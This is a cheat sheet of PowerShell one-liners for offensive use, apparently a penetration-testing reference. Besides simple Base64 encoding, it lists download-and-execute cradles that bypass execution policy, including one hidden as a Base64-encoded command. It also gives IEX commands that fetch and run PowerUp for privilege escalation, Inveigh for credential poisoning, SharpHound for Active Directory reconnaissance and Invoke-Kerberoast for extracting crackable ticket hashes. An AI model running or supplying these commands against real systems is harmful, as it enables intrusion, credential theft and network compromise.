Oneliners / commands for powershell.

Base64

Simple string encode

[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("ENCODE THIS :  `"STR`" !"))

Simple string decode

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("RU5DT0RFIFRISVMgOiAgIlNUUiIgIQ=="))

Download/Exec

HTTP cleartext dl/exec

powershell -Sta -Nop -exec bypass -c "(New-Object Net.WebClient).DownloadString('http://IP:PORT/a.html')"

HTTP encoded dl/exec

powershell -Sta -Nop -exec bypass -e KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA1AC8AYQAuAGgAdABtAGwAJwApAA===

Exec useful modules

PowerUp.ps1 / Invoke-Allchecks

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Invoke-AllChecks"

Inveigh.ps1 / Responder

 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y  -Proxy Y -LogOutput Y -FileOutput Y"

Bloodhound

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

Invoke-Kerberoast

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat hashcat  | fl"